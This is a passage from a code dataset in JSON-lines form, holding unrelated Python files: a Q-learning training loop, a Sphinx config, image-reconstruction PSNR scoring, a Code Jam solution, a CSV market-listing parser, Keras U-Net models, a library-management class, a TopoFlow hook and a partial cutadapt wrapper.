Q-values:\n model_actions = q_values.data.max(1)[1].view(args.mini_batch_size)\n\n # Performing Epsilon Greedy Exploration:\n agent_actions = []\n for i in range(args.mini_batch_size):\n\n # Model choice:\n if (random.random() > EPS):\n agent_actions.append(model_actions[i])\n\n # Epsilong Greedy:\n else:\n epsilon_action = random.randint(0, 2)\n\n # Request:\n if 
(epsilon_action == 0):\n                        agent_actions.append(args.class_vector_size)\n\n                    # Incorrect Prediction:\n                    elif (epsilon_action == 1):\n                        wrong_label = random.randint(0, args.class_vector_size - 1)\n                        while (wrong_label == episode_labels[i]):\n                            wrong_label = random.randint(0, args.class_vector_size - 1)\n                        agent_actions.append(wrong_label)\n\n                    # Correct Prediction:\n                    else:\n                        agent_actions.append(episode_labels[i])\n            \n            # Collect rewards:\n            rewards = reinforcement_learner.collect_reward_batch(agent_actions, one_hot_labels, args.mini_batch_size)\n\n            # Collecting average reward at time t:\n            episode_reward += float(sum(rewards)/args.mini_batch_size)\n\n            # Just some statistics logging:\n            for i in range(args.mini_batch_size):\n                true_label = episode_labels[i]\n\n                # Statistics:\n                reward = rewards[i]\n                if (reward == reinforcement_learner.request_reward):\n                    episode_request += 1\n                    episode_predict += 1\n                    if (label_dict[i][true_label] in request_dict):\n                        request_dict[label_dict[i][true_label]][-1].append(1)\n                    if (label_dict[i][true_label] in accuracy_dict):\n                        accuracy_dict[label_dict[i][true_label]][-1].append(0)\n                elif (reward == reinforcement_learner.prediction_reward):\n                    episode_correct += 1.0\n                    episode_predict += 1.0\n                    if (label_dict[i][true_label] in request_dict):\n                        request_dict[label_dict[i][true_label]][-1].append(0)\n                    if (label_dict[i][true_label] in accuracy_dict):\n                        accuracy_dict[label_dict[i][true_label]][-1].append(1)\n                else:\n                    episode_predict += 1.0\n                    if (label_dict[i][true_label] in request_dict):\n                        request_dict[label_dict[i][true_label]][-1].append(0)\n                    if (label_dict[i][true_label] in accuracy_dict):\n                        accuracy_dict[label_dict[i][true_label]][-1].append(0)\n\n            # Tensoring the reward:\n            #rewards = Variable(torch.Tensor([rewards]))\n            rewards = torch.Tensor([rewards])\n\n            # Observe next state and images:\n            next_state_start = reinforcement_learner.next_state_batch(agent_actions, one_hot_labels, args.mini_batch_size)\n\n            # Need to collect the representative Q-values:\n            agent_actions = torch.LongTensor(agent_actions).unsqueeze(1)\n            #agent_actions = Variable(torch.LongTensor(agent_actions).unsqueeze(1))\n            #current_q_values = q_values.gather(1, agent_actions)\n\n            # Non-final state:\n            if (i_e < args.episode_size - 1):\n                # Collect next image:\n                next_flat_images = image_batch[i_e + 1].squeeze().view(args.mini_batch_size, -1)\n\n                # Create next state:\n                next_state = torch.cat((torch.FloatTensor(next_state_start), next_flat_images), 1)\n\n                transitions.append(Transition(state, agent_actions, next_state, rewards))\n                \"\"\"\n                # Get target value for next state:\n                target_value = model(Variable(next_state, volatile=True), hidden)[0].max(1)[0]\n\n                # Making it un-volatile again:\n                target_value.volatile = False\n\n                # Discounting the next state + reward collected in this state:\n                discounted_target_value = (GAMMA*target_value) + rewards\n\n                # Calculating Bellman error:\n                difference = discounted_target_value.squeeze().sub(current_q_values)\n                loss = loss.add(difference.pow(2).squeeze())\n                \"\"\"\n\n            # Final state:\n            else:\n                transitions.append(Transition(state, agent_actions, None, rewards))\n                \"\"\"\n                # As there is no next state, we only have the rewards:\n                discounted_target_value = rewards\n\n\n                # Calculating Bellman error:\n                difference = discounted_target_value.squeeze().sub(current_q_values)\n                loss = loss.add(difference.pow(2).squeeze())\n                \"\"\"\n            \n            # Update current state:\n            state = next_state_start\n\n        ### END TRAIN LOOP ###\n\n        avg_loss = optimize(transitions, model, optimizer, args)\n\n        \"\"\"\n        # Zeroing accumulated gradients:\n
        optimizer.zero_grad()\n\n        # Averaging Loss over batch (SGD):\n        avg_loss = torch.mean(loss)\n\n        # Backpropagating error:\n        avg_loss.backward()\n\n        # Taking one step in the SGD optimizer:\n        optimizer.step()\n        \"\"\"\n\n\n        # Collect stats:\n        batch_correct += episode_correct\n        batch_predict += episode_predict\n        batch_request += episode_request\n        batch_reward += episode_reward\n\n        \n\n        print(\"\\n--- Epoch \" + str(epoch) + \", Episode \" + str(episode + b + 1) + \" Statistics ---\")\n        print(\"Instance\\tAccuracy\\tRequests\")\n        for key in accuracy_dict.keys():\n            prediction_batch = accuracy_dict[key][(-1*args.batch_size):]\n            request_batch = request_dict[key][(-1*args.batch_size):]\n            \n            # Accuracy:\n            predictions = .0\n            nof_predictions = .0\n\n            # Request:\n            requests = .0\n            nof_requests = .0\n\n            # Averaging:\n            for episode in range(len(prediction_batch)):\n\n                # Accuracy:\n                predictions += sum(prediction_batch[episode])\n                nof_predictions += len(prediction_batch[episode])\n\n                # Request:\n                requests += sum(request_batch[episode])\n                nof_requests += len(request_batch[episode])\n\n            accuracy = float(predictions/nof_predictions)\n            request_percentage = float(requests/nof_requests)\n            \n            print(\"Instance \" + str(key) + \":\\t\" + str(100.0*accuracy)[0:4] + \" %\" + \"\\t\\t\" + str(100.0*request_percentage)[0:4] + \" %\")\n            \n\n        # Even more status update:\n        print(\"\\n+------------------STATISTICS----------------------+\")\n        total_prediction_accuracy = float((100.0 * batch_correct) / max(1, batch_predict-batch_request))\n        print(\"Batch Average Prediction Accuracy = \" + str(total_prediction_accuracy)[:5] + \" %\")\n        total_accuracy = float((100.0 * batch_correct) / batch_predict)\n        print(\"Batch Average Accuracy = \" + str(total_accuracy)[:5] + \" %\")\n        total_loss = float(avg_loss.data[0])\n        print(\"Batch Average Loss = \" + str(total_loss)[:5])\n        total_requests = float((100.0 * batch_request) / (args.batch_size*args.episode_size))\n        print(\"Batch Average Requests = \" + str(total_requests)[:5] + \" %\")\n        total_reward = float(batch_reward/args.batch_size)\n        print(\"Batch Average Reward = \" + str(total_reward)[:5])\n        print(\"+--------------------------------------------------+\\n\")\n\n        ### LOGGING TO TENSORBOARD ###\n        data = {\n            'training_total_requests': total_requests,\n            'training_total_accuracy': total_accuracy,\n            'training_total_loss': total_loss,\n            'training_average_reward': total_reward\n        }\n\n        for tag, value in data.items():\n            writer.scalar_summary(tag, value, epoch)\n        ### DONE LOGGING ###\n\n    return total_prediction_accuracy, total_requests, total_accuracy, total_loss, total_reward, request_dict, accuracy_dict\n\n\ndef optimize(transitions, model, optimizer, args):\n\n    batch = Transition(*zip(*transitions))\n\n    hidden = model.reset_hidden(args.mini_batch_size)\n\n    non_final_mask = torch.ByteTensor(tuple(map(lambda s: s is not None,\n                                          batch.next_state)))\n    non_final_next_states = Variable(torch.cat([s for s in batch.next_state\n                                                if s is not None]),\n                                     volatile=True)\n\n    state_batch = Variable(torch.cat(batch.state))\n    action_batch = Variable(torch.cat(batch.action))\n    reward_batch = Variable(torch.cat(batch.reward))\n\n    q_values, hidden = model(state_batch, hidden, seq=args.episode_size)\n\n    print(q_values)\n    print(action_batch)\n    state_action_values = q_values.gather(1, action_batch)\n\n    # Compute V(s_{t+1}) for all next states.\n    next_state_values = Variable(torch.zeros(args.episode_size).type(torch.Tensor))\n    next_state_values[non_final_mask] = model(non_final_next_states, hidden, seq=args.episode_size)[0].max(1)[0]\n    # Now, we don't want to mess up the loss with a volatile flag, so let's\n    # clear it. After this, we'll just end up with a Variable that has\n    # requires_grad=False\n    next_state_values.volatile = False\n    # Compute the expected Q values\n    expected_state_action_values = (next_state_values * GAMMA) + reward_batch\n\n    # Compute Huber loss\n    loss = F.smooth_l1_loss(state_action_values, expected_state_action_values)\n\n    # Optimize the model\n    optimizer.zero_grad()\n    loss.backward()\n\n    for param in model.parameters():\n        param.grad.data.clamp_(-1, 1)\n    optimizer.step()\n\n    return loss\n\n\n\n\ndef print_graph(grad_fn):\n    seen = set()\n    params = None\n\n    def size_to_str(size):\n        return '('+(', ').join(['%d' % v for v in size])+')'\n\n    def add_nodes(var):\n\n        \n        if torch.is_tensor(var):\n            print(\"Node Orange = IS TENSOR: \", str(id(var)))\n        elif hasattr(var, 'variable'):\n            u = var.variable\n            name = param_map[id(u)] if params is not None else ''\n            node_name = '%s\\n %s' % (name, size_to_str(u.size()))\n            print(\"Node BLUE = \", str(id(var)), node_name)\n        else:\n            print(\"Node = \", str(type(var).__name__), str(id(var)))\n        if var not in seen:\n            seen.add(var)\n            if hasattr(var, 'next_functions'):\n                for u in var.next_functions:\n                    if u[0] is not None:\n                        add_nodes(u[0])\n            if hasattr(var, 'saved_tensors'):\n                for t in var.saved_tensors:\n                    add_nodes(t)\n    add_nodes(grad_fn)\n\n","sub_path":"reinforcement/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"145592600","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom pallets_sphinx_themes import ProjectLink, get_version\n\n# Project --------------------------------------------------------------\n\nproject = \"WTForms-Django\"\ncopyright = \"2008, WTForms team\"\nauthor = \"WTForms team\"\nrelease, version = get_version(\"WTForms-Django\")\n\n# General --------------------------------------------------------------\n\nmaster_doc = \"index\"\n\nextensions = [\"sphinx.ext.autodoc\", \"sphinx.ext.intersphinx\"]\n\nintersphinx_mapping = {\n    \"python\": (\"https://docs.python.org/3/\", None),\n    \"wtforms\": (\"https://wtforms.readthedocs.io/en/stable/\", None),\n    \"django\": (\n        \"https://docs.djangoproject.com/en/stable/\",\n        \"https://docs.djangoproject.com/en/stable/_objects/\",\n    ),\n}\n\n# HTML -----------------------------------------------------------------\n\nhtml_theme = \"flask\"\nhtml_context = {\n    \"project_links\": [\n        ProjectLink(\"PyPI releases\", \"https://pypi.org/project/WTForms-Django/\"),\n        ProjectLink(\"Source Code\", \"https://github.com/wtforms/wtforms-django/\"),\n        ProjectLink(\"Issue Tracker\", \"https://github.com/wtforms/wtforms/issues/\"),\n    ]\n}\nhtml_sidebars = {\n    \"index\": [\"project.html\", \"searchbox.html\"],\n    \"**\": [\"localtoc.html\", \"relations.html\", \"searchbox.html\"],\n}\nhtml_show_sourcelink = False\n\n# LaTeX ----------------------------------------------------------------\n\nlatex_documents = [\n    (master_doc, project + \".tex\", project + \" Documentation\", author, \"manual\")\n]\n","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"297866024","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\nfrom DeCNN import train_data_prepare as tdp\nfrom DeCNN import DeconvNN_CS_1 as De1\nfrom DeCNN import 
showResult as sR\nimport os\nimport time\n\n\ndef save_Result_img(imgArrayList, oriFileDir, saveDir, nn, crop_strides, start):\n    img1List = get_imgArrayList_from_nn(imgArrayList=imgArrayList, nn=nn)\n    end = time.perf_counter()\n    print(\"Run time:\", (end-start))\n    print(\"average Run time:\", ((end-start)/12))\n    img1List_ori = tdp.down_dim(img1List)\n    tdp.paste_from_crops_to_fileDir(img1List=img1List_ori, oriFileDir=oriFileDir, saveDir=saveDir,\n                                    crop_strides=crop_strides)\n    return\n\n\ndef get_imgArrayList_from_nn(imgArrayList, nn):\n    reconstructList = []\n    batch_num = int(len(imgArrayList)/De1.batch_size)\n    for i in range(batch_num):\n        img_arr_batch = De1.get_block_from_data(imgArrayList, data_batch_size=De1.batch_size, j=i)  # same helper function the deconvolution network uses\n        reconstruct_batch = nn.getReconstruct(img_arr_batch, De1.ge_csphi(ge_new=False))\n        for re_img_array in reconstruct_batch:\n            reconstructList.append(re_img_array)\n    print(\"len(reconstructList):\", len(reconstructList))\n    return reconstructList\n\n\ndef save_reconImg_from_nn(nn):\n    dirs = \"./Training_Data_L/test_images/noiseless/\"\n    saveDir = './Training_Data_L/re_test_images/noiseless/v1/mr_0_01_e1000/'\n    imgList = tdp.eachFile(dirs)\n    #print(\"last one:\", imgList[len(imgList)-1])\n    crop_strides = tdp.crops_width\n    imgArrayList = tdp.crop_img(imgList, crop_strides=crop_strides)\n    imgArrayList_up = tdp.up_dim(imgArrayList)\n    start = time.perf_counter()\n    save_Result_img(imgArrayList=imgArrayList_up, oriFileDir=dirs, saveDir=saveDir, nn=nn, crop_strides=crop_strides, start = start)\n    return\n\n\ndef cal_each_mean_PSNR(oriImgDir, reconImgDir):\n\n    oriImgFullPaths = tdp.eachFile(oriImgDir)\n    reconImgFullPaths = tdp.eachFile(reconImgDir)\n    #oriImgList = []\n    #reconImgList = []\n    oridict = {}\n    redict = {}\n    for oriImgFullPath in oriImgFullPaths:\n        oriImgName = os.path.split(oriImgFullPath)[1].split(\".\")[0]\n        oridict[oriImgName] = oriImgFullPath\n        '''\n        a.append(os.path.split(oriImgFullPath)[1])\n        oriImg = Image.open(oriImgFullPath)\n        oriImgList.append(oriImg)\n        '''\n    for reconImgFullPath in reconImgFullPaths:\n        reconImgName = os.path.split(reconImgFullPath)[1].split('.')[0]\n        redict[reconImgName] = reconImgFullPath\n        '''\n        b.append(os.path.split(reconImgFullPath)[1])\n        reconImg = Image.open(reconImgFullPath)\n        reconImgList.append(reconImg)\n        '''\n    '''\n    print(\"ori:\", a)\n    print(\"re:\", b)\n    '''\n    PSNR_dict = {}\n    totalPSNR = 0\n    #for i in range(len(oriImgList)):\n    for i in oridict:\n        #print(i)\n        oriImg = Image.open(oridict[i])\n        reImg = Image.open(redict[i])\n        somePSNR = sR.calc_PSNR(generate_img=reImg, original_img=oriImg)\n        #somePSNR = sR.calc_PSNR(generate_img=reconImgList[i], original_img=oriImgList[i])\n        #PSNR_dict[os.path.split(oriImgFullPaths[i])[1]] = somePSNR\n        PSNR_dict[i] = somePSNR\n        totalPSNR += somePSNR\n    #meanPSNR = totalPSNR/len(oriImgList)\n    meanPSNR = totalPSNR / len(oridict)\n    print(\"PSNR of each pair:\", PSNR_dict)\n    print(\"meanPSNR:\", meanPSNR)\n    #print(\"without flinstone, meanPSNR:\", (totalPSNR-PSNR_dict['flinstones'])/(len(oridict)-1))\n    return\n\nif __name__ == '__main__':\n    #Decnn = De1.De_ops(init_op=False)\n    #save_reconImg_from_nn(nn=Decnn)\n\n    oriImgDir = './Training_Data_L/test_images/noiseless/'\n    reconImgDir = './Training_Data_L/re_test_images/noiseless/v1/mr_0_01_e1000/'\n    print(reconImgDir)\n    cal_each_mean_PSNR(oriImgDir=oriImgDir, reconImgDir=reconImgDir)\n\n    # paste each image in the folder onto a standard-size background\n    # dir1 = './Training_Data_L/reconTrain/'\n    # dir2 = './Training_Data_L/reconTrainSTS/'\n    # tdp.paste_entireImg_to_standardSizeImg(imgDirPath=dir1, 
saveDirPath=dir2)","sub_path":"DeCNN/save_recon_Image.py","file_name":"save_recon_Image.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52415501","text":"SLEEP = set([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n\r\ndef get_soln(in_num):\r\n    if in_num == 0:\r\n        return 'INSOMNIA'\r\n    else:\r\n        seen = set()\r\n        num = in_num\r\n        x = 2\r\n        while True:\r\n            seen.update(map(int, str(num)))\r\n            if seen == SLEEP:\r\n                break\r\n            else:\r\n                num = in_num * x\r\n                x += 1\r\n\r\n        return num\r\n\r\n\r\nnum_problems = int(input())\r\nfor i in range(num_problems):\r\n    num = int(input())\r\n    soln = get_soln(num)\r\n    print('Case #{}: {}'.format(i + 1, soln))","sub_path":"codes/CodeJamCrawler/16_0_1/JProkop/sleep.py","file_name":"sleep.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548519142","text":"# Vendor,Category, Item, Price, Origin,Destination, Rating, Remarks\n# cyberzen,Services/Other,Insider's Forex Trading Signals (Make Thousands of $$$'s DAILY from my 20 yr Daytrader),2.569571838605444 BTC,,,4.89/5,Average price may be skewed outliar > .5 BTC found\n\ndef create_dataset(file):\n\n    dataset = dict()\n\n    with open(file, 'r', encoding=\"utf8\") as f:\n        file_line = f.readline()\n\n        if not file_line:\n            return dataset\n\n        main_header = file_line.rstrip().split(\",\")\n\n        file_line = f.readline()\n        while file_line:\n\n            [Vendor, Category, Item, Price, Origin, Destination, Rating, Remarks] = [element.strip() for element in file_line.rstrip().split(\",\")]\n\n            if Vendor not in dataset:\n                dataset[Vendor] = dict()\n\n            if Category not in dataset[Vendor]:\n                dataset[Vendor][Category] = dict()\n\n            dataset[Vendor][Category].update({\n                Item: {\n                    'Price': Price,\n                    'Rating': Rating,\n\n                }\n            })\n\n            file_line = f.readline()\n\n    return dataset\nprint(create_dataset('Agora.csv'))","sub_path":"km-84/Misak_Yuri/workshop6/homework/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536374698","text":"import numpy as np\nimport keras\nimport tensorflow as tf\n\nfrom keras import models, backend, Model\nfrom keras.layers import Input, Conv2D, MaxPool2D, ZeroPadding2D, MaxPooling2D, Conv2DTranspose\nfrom keras.layers import BatchNormalization, Flatten, Dense, Reshape, concatenate\n\n'''\n    1000fps simple-seg net model\n    simple-seg-net ACC: 62.70% (as reported in the paper)\n'''\ndef get_1000fps_model(input_size,filters=64):\n    input_shape = (*input_size,3)\n    x = Input(input_shape,name=\"input\")\n    #First Convolution Block\n    block_name = \"conv1-\"\n    inode = ZeroPadding2D(padding=(2,2),name=block_name+\"padding\")(x)\n    inode = Conv2D(filters, (5,5), strides=(1,1), activation='relu',name=block_name+\"conv\")(inode)\n    inode = MaxPool2D(pool_size=(3,3),strides=2,name=block_name+\"pool\")(inode)\n    inode = BatchNormalization(name=block_name+\"batchnorm\")(inode)\n\n    #Second Convolution Block\n    block_name = \"conv2-\"\n    inode = ZeroPadding2D(padding=(2,2),name=block_name+\"padding\")(inode)\n    inode = Conv2D(filters, (5,5), strides=(1,1), activation='relu',name=block_name+\"conv\")(inode)\n    inode = MaxPool2D(pool_size=(3,3),strides=2,name=block_name+\"pool\")(inode)\n    inode = BatchNormalization(name=block_name+\"batchnorm\")(inode)\n\n    #Third Convolution Block\n    block_name = \"conv3-\"\n    inode = Conv2D(filters, (3,3), strides=(1,1), 
activation='relu',name=block_name+\"conv\")(inode)\n\n    #First FC layer\n    block_name = \"fc1\"\n    inode = Flatten(name='flatten')(inode)\n    inode = Dense(100, activation='relu',name=block_name)(inode)\n\n    #Second FC layer\n    block_name = \"fc2\"\n    inode = Dense(400, activation='relu',name=block_name)(inode)\n\n    #output layer\n    block_name = \"out-\"\n    inode = Dense(input_size[0]*input_size[1], activation='sigmoid',name=block_name+\"fc\")(inode)\n\n    y = Reshape(input_size,name=block_name+'reshape')(inode)\n    return Model(x,y)\n\n'''\n    U-NET Architecture\n    target ACC: 80%\n    -> expecting higher ACC after switching to Dense-Net\n'''\ndef unet_convBlock(x, filters, block_name,zero_padding=False):\n    if zero_padding:\n        x = ZeroPadding2D(padding=(1,1))(x)\n        conv = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv1\") (x)\n    else:\n        conv = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv1\") (x)\n    \n    if zero_padding:\n        conv = ZeroPadding2D(padding=(1,1))(conv)\n        conv = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv2\") (conv)\n    else:\n        conv = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv2\") (conv)\n    \n    out = MaxPooling2D((2, 2), name=block_name+\"pool\") (conv)\n    return conv, out\n\ndef unet_upconvBlock(x, connect_layer, filters, block_name,zero_padding=False):\n    upconv = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same', name=block_name+\"upconv1\") (x)\n    concat = concatenate([upconv, connect_layer], axis=3, name=block_name+\"concat\")\n    if zero_padding:\n        conv = ZeroPadding2D(padding=(1,1))(concat)\n        conv = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv1\") (conv)\n    else:\n        conv = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv1\") (concat)    \n    \n    if zero_padding:\n        conv = ZeroPadding2D(padding=(1,1))(conv)\n        out = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv2\") (conv)\n    else:\n        out = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv2\") (conv)\n    return out\n\ndef get_basic_unet_model(input_size, depth =4, filters=8, zero_padding=False):\n    input_shape = (*input_size,3)\n    x = Input(input_shape,name=\"input\")\n\n    # Down part\n    p = None\n    convs = []\n    for i in range(depth):\n        if p is None:\n            c, p = unet_convBlock(x, filters, block_name=\"conv{}-\".format(i))\n        else:\n            c, p = unet_convBlock(p, filters, block_name=\"conv{}-\".format(i))\n        convs.append(c)\n        filters*=2\n\n    # Bottom part\n    if zero_padding:\n        p = ZeroPadding2D(padding=(1,1))(p)\n        p = Conv2D(filters, (3, 3), activation='relu', padding='valid', name='mid-1') (p)\n    else:\n        p = Conv2D(filters, (3, 3), activation='relu', padding='same', name='mid-1') (p)\n\n    if zero_padding:\n        p = ZeroPadding2D(padding=(1,1))(p)\n        p = Conv2D(filters, (3, 3), activation='relu', padding='valid', name='mid-2') (p)\n    else:\n        p = Conv2D(filters, (3, 3), activation='relu', padding='same', name='mid-2') (p)\n\n    # Up part\n    for i in range(depth-1,-1,-1):\n        filters //= 2\n        if i == depth-1:\n            c = unet_upconvBlock(p, convs[i], filters, block_name=\"upconv{}-\".format(i))\n        else:\n            c = unet_upconvBlock(c, convs[i], filters, block_name=\"upconv{}-\".format(i))\n\n    c = Conv2D(1, (1, 1), activation='sigmoid') (c)\n    y = Reshape(input_size)(c)\n\n    model = Model(inputs=x, outputs=y)\n    return 
model","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"509902588","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Filename: LibraryManagement.py\n# @Author: Yalu\n# @Time: 2/10/2018 8:34 PM\n\"\"\"\nA program that allows to borrow and return books from a library.\nSuppose that the library cannot own more than one copy of each book.\nA list of books will be stored in a file “exercise 8.dat” that will automatically be read at the start of the program.\nDuplicate books are not allowed in the file, and each book is assigned a unique ID (a positive integer).\nEvery book is available at the start of the program.\nThe program allows the following operations:\n• “display” displays for each book in the collection displays the title, their ID, as well as their availability,\n• “check ID” checks the availability of a book given its ID,\n• “borrow ID” marks the book with that ID as borrowed,\n• “return ID” Return a book with that ID.\nFinally, the commands should display appropriate error messages when:\n• trying to borrow or return a book with an invalid ID (i.e. it does not belong to the collection),\n• trying to borrow a book that is not available (i.e. it has been borrowed already),\n• trying to return a book that has not been borrowed.\n\"\"\"\n\n\nclass Book:\n def __init__(self, title, number):\n self.name = title\n self.id = number\n self.availability = True\n\n def get_name(self):\n return self.name\n\n def get_id(self):\n return self.id\n\n def get_availability(self):\n return self.availability\n\n def set_name(self, new_name):\n self.name = new_name\n\n def set_id(self, new_id):\n self.id = new_id\n\n def set_availability(self, new_status):\n self.availability = new_status\n\n def display(self):\n print('Title:', self.name, '\\nID:', self.id, '\\nAvailability:', self.availability, '\\n')\n\n\nclass Library:\n def __init__(self):\n self.books = []\n self.book_count = 0\n self.load_books()\n\n def load_books(self):\n # Use a string instead just because I don't want to make that .bat file.\n # Anyways, I know they both work.\n # If you want to read from the file, uncomment line 272-274, comment line 275-283,\n # and make the 'exercise_8.dat' file to store the string content in one line.\n\n # f = open('exercise_8.dat', 'r')\n # book_list = f.readline().split(' - ')\n # f.close()\n book_list = \"In Search of Lost Time - \" \\\n \"Alice's Adventures in Wonderland - \" \\\n \"East of Eden - \" \\\n \"The Odyssey - \" \\\n \"Twenty Thousand Leagues Under the Sea - \" \\\n \"Man’s Fate - The Picture of Dorian Gray - \" \\\n \"Adventures of Huckleberry Finn - \" \\\n \"Nineteen Eighty Four - \" \\\n \"Reveries of a Solitary Walker\".split(' - ')\n for book in book_list:\n self.book_count += 1\n self.books.append(Book(book, self.book_count))\n\n def display(self):\n for book in self.books:\n book.display()\n\n def check_id(self, book_id):\n if 0 < book_id <= self.book_count:\n for book in self.books:\n if book.get_id() == book_id:\n print(book.get_availability())\n else:\n print('Invalid ID')\n\n def borrow_id(self, book_id):\n if 0 < book_id <= self.book_count:\n for book in self.books:\n if book.get_id() == book_id:\n if book.get_availability():\n book.set_availability(False)\n else:\n print(book.get_name(), 'is not available.')\n break\n else:\n print('Invalid ID')\n\n def return_id(self, book_id):\n if 0 < book_id <= self.book_count:\n for 
book in self.books:\n                if book.get_id() == book_id:\n                    if not book.get_availability():\n                        book.set_availability(True)\n                    else:\n                        print(book.get_name(), 'is not borrowed.')\n                    break\n        else:\n            print('Invalid ID')\n\n\nif __name__ == '__main__':\n    lib = Library()\n    lib.display()\n    lib.check_id(0)\n    lib.check_id(11)\n    lib.return_id(0)\n    lib.return_id(11)\n    lib.borrow_id(0)\n    lib.borrow_id(11)\n    lib.return_id(2)\n    lib.borrow_id(2)\n    lib.borrow_id(2)\n    lib.display()\n","sub_path":"rubish/LibraryManagement.py","file_name":"LibraryManagement.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"577310709","text":"from sys import stdin\nfrom collections import deque\n\nclass TreeNode:\n    def __init__(self, value):\n        self.left = None\n        self.right = None\n        self.data = value\n\nclass Tree:\n    def __init__(self):\n        self.root = None\n\n    def addNode(self, node, value):\n        if(node==None):\n            self.root = TreeNode(value)\n        else:\n            if(value<node.data):\n                if(node.left==None):\n                    node.left = TreeNode(value)\n                else:\n                    self.addNode(node.left, value)\n            elif(value>node.data):\n                if(node.right==None):\n                    node.right = TreeNode(value)\n                else:\n                    self.addNode(node.right, value)\n            else:\n                return\n\n    def getHeight(self, node):\n        if node == None:\n            return 0\n        lNode = self.getHeight(node.left)\n        rNode = self.getHeight(node.right)\n        return max(lNode, rNode) + 1\n    \nf = deque()\ntree = Tree()\n\nwhile True:\n    a = [int(x) for x in stdin.readline().split()]\n    if a[0] == 0:\n        f.appendleft(a[1])\n    elif a[0] == 1:\n        f.append(a[1])\n    elif a[0] == 2:\n        try:\n            i = f.index(a[1])\n            f.insert(i + 1,(a[2]))\n        except:\n            f.appendleft(a[2])\n    else:\n        for i in f:\n            tree.addNode(tree.root, i)\n        print(tree.getHeight(tree.root))\n        exit()","sub_path":"Wecode/19520214/Week 3.1/Problem_3.py","file_name":"Problem_3.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"397655911","text":"import os\nimport shutil\n\nfrom wmt.config import site\nfrom wmt.models.submissions import prepend_to_path\nfrom wmt.utils.hook import find_simulation_input_file\nfrom topoflow_utils.hook import choices_map\n\n\nfile_list = ['rti_file',\n\t     'DEM_file',\n             'H0_file',\n             'pixel_file']\n\n\ndef execute(env):\n    \"\"\"Perform pre-stage tasks for running a component.\n\n    Parameters\n    ----------\n    env : dict\n        A dict of component parameter values from WMT.\n\n    \"\"\"\n    env['n_steps'] = int(round(float(env['run_duration']) / float(env['dt'])))\n    env['save_grid_dt'] = float(env['dt'])\n    env['save_pixels_dt'] = float(env['dt'])\n\n    # TopoFlow needs site_prefix and case_prefix.\n    env['site_prefix'] = os.path.splitext(env['rti_file'])[0]    \n    env['case_prefix'] = 'WMT'\n\n    # If no pixel_file is given, let TopoFlow make one.\n    if env['pixel_file'] == 'off':\n        file_list.remove('pixel_file')\n        env['pixel_file'] = env['case_prefix'] + '_outlets.txt'\n\n    if env['H0_file'] == 'off':\n        file_list.remove('H0_file')\n        env['H0_file'] = 'None'\n\n    env['VARIABLE_DT_TOGGLE'] = choices_map[env['VARIABLE_DT_TOGGLE']]\n    env['INIT_COND_TOGGLE'] = choices_map[env['INIT_COND_TOGGLE']]\n    env['GENERIC_ICE_TOGGLE'] = choices_map[env['GENERIC_ICE_TOGGLE']]\n    env['ICEFLOW_TOGGLE'] = choices_map[env['ICEFLOW_TOGGLE']]\n    env['ICESLIDE_TOGGLE'] = choices_map[env['ICESLIDE_TOGGLE']]\n    env['FREEZE_ON_TOGGLE'] = choices_map[env['FREEZE_ON_TOGGLE']]\n\n    # Default files common to all TopoFlow components are stored with the\n    # topoflow component metadata.\n    prepend_to_path('WMT_INPUT_FILE_PATH',\n                    os.path.join(site['db'], 'components', 'topoflow', 
'files'))\n for fname in file_list:\n src = find_simulation_input_file(env[fname])\n shutil.copy(src, os.curdir)\n","sub_path":"ice_gc2d/hooks/pre-stage.py","file_name":"pre-stage.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629965703","text":"import os,subprocess\nfrom igf_data.utils.fileutils import check_file_path,get_temp_dir\nfrom igf_data.utils.singularity_run_wrapper import execute_singuarity_cmd\n\ndef run_cutadapt(\n read1_fastq_in, read1_fastq_out, read2_fastq_in=None, read2_fastq_out=None, dry_run=False,\n cutadapt_exe='cutadapt', singularity_image_path=None, cutadapt_options=('--cores=1',)):\n try:\n check_file_path(read1_fastq_in)\n if read2_fastq_in is not None:\n check_file_path(read2_fastq_in)\n if singularity_image_path is not None:\n check_file_path(singularity_image_path)\n cmd = [cutadapt_exe]\n if isinstance(cutadapt_options,tuple):\n cutadapt_options = list(cutadapt_options)\n if cutadapt_options is not None and \\\n len(cutadapt_options) > 0:\n cmd.\\\n extend(cutadapt_options)\n if read2_fastq_in is not None:\n if read2_fastq_out is None:\n raise 